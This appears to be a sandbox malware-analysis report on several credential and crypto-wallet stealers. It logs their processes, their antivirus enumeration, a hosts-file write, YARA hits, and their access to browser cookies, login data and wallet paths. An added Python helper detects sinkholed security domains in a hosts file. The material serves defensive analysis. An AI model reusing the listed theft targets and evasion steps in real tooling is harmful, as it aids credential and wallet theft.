Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Nursultan.exe | Queries volume information: C:\Users\user\Desktop\Nursultan.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
                            Source: C:\Users\user\Desktop\Nursultan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: Microsoft Edge.exe, 00000003.00000002.3351187295.000000001CCF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3287313221.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BE21000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BE7D000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BDC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
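The report records that Umbral.exe wrote C:\Windows\System32\drivers\etc\hosts, but not what it wrote. The following Python is an added triage helper, not part of the Joe Sandbox report or of any of the detected families: it parses a hosts file the way the resolver reads it (comments and malformed lines ignored) and flags the two patterns a stealer leaves there, a non-local hostname pinned to a loopback or null address (which silently breaks AV updates and sample uploads to vendors such as VirusTotal), and a hostname redirected to some other address. The hosts content in SAMPLE_HOSTS and the vendor keyword list are constructed for illustration and are assumptions, not taken from the sample.

```python
"""
Added triage helper (not part of the Joe Sandbox report): parse a Windows
hosts file and flag the entries a stealer typically writes there. The report
records only that Umbral.exe wrote the hosts file, not its content, so
SAMPLE_HOSTS below is constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass

# Addresses that turn a hosts entry into a sinkhole rather than a redirect.
SINKHOLE_ADDRS = {"0.0.0.0", "127.0.0.1", "::1", "::"}

# Names that legitimately resolve to loopback on a stock Windows install.
DEFAULT_LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

# Substrings of vendor/update hostnames stealers commonly block so that
# AV updates and sample uploads fail. Assumed list; extend for your estate.
SECURITY_KEYWORDS = (
    "virustotal", "windowsupdate", "microsoft", "avast", "kaspersky",
    "malwarebytes", "eset", "bitdefender", "mcafee", "norton", "sophos",
)


@dataclass(frozen=True)
class HostsFinding:
    line_no: int
    address: str
    hostname: str
    reason: str


def parse_hosts(text):
    """Yield (line_no, normalised_address, [hostnames]) for each active entry.

    Everything after '#' is a comment; blank and malformed lines are skipped,
    which is what the resolver does too, so the output is the effective map.
    """
    for line_no, raw in enumerate(text.splitlines(), start=1):
        body = raw.split("#", 1)[0].strip()
        fields = body.split()
        if len(fields) < 2:
            continue
        try:
            addr = str(ipaddress.ip_address(fields[0]))  # "::1" == "0:0:0:0:0:0:0:1"
        except ValueError:
            continue
        yield line_no, addr, fields[1:]


def classify(addr, hostname):
    """Return a reason string if the entry is suspicious, else None."""
    name = hostname.lower()
    if name in DEFAULT_LOCAL_NAMES:
        return None
    if addr in SINKHOLE_ADDRS:
        hit = next((k for k in SECURITY_KEYWORDS if k in name), None)
        if hit:
            return f"security/update host sinkholed to {addr} (matched '{hit}')"
        return f"non-local hostname sinkholed to {addr}"
    return f"hostname redirected to {addr} (possible pharming)"


def find_suspicious_entries(text):
    """All findings in file order; an entry with several names yields several."""
    findings = []
    for line_no, addr, names in parse_hosts(text):
        for hostname in names:
            reason = classify(addr, hostname)
            if reason:
                findings.append(HostsFinding(line_no, addr, hostname, reason))
    return findings


# Constructed sample: the stock Windows header plus entries of the kind a
# stealer appends. None of these lines come from the report.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
#    ::1             localhost
0.0.0.0 virustotal.com www.virustotal.com
127.0.0.1 avast.com
0.0.0.0 update.example.internal
203.0.113.5 login.example-bank.test
"""

if __name__ == "__main__":
    # On a live host read Path(r"C:\Windows\System32\drivers\etc\hosts") instead.
    for f in find_suspicious_entries(SAMPLE_HOSTS):
        print(f"line {f.line_no}: {f.address:<12} {f.hostname:<28} {f.reason}")
```

The "possible pharming" class will also catch legitimate static entries (internal printers, lab hosts), so treat it as a review list rather than an alert; the sinkhole classes are the ones that match what stealers write. Pair this with the AntivirusProduct query above: a process that enumerates root\SecurityCenter2 and then edits hosts is fingerprinting the installed AV so it knows which vendor domains to block.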

Stealing of Sensitive Information

Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000002.2206155033.00000220C9505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 7384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 7820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 5492, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Yara match | File source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan.exe PID: 764, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsoft Edge.exe PID: 3056, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Wallets\Exodus\
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Wallets\Ethereum\
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
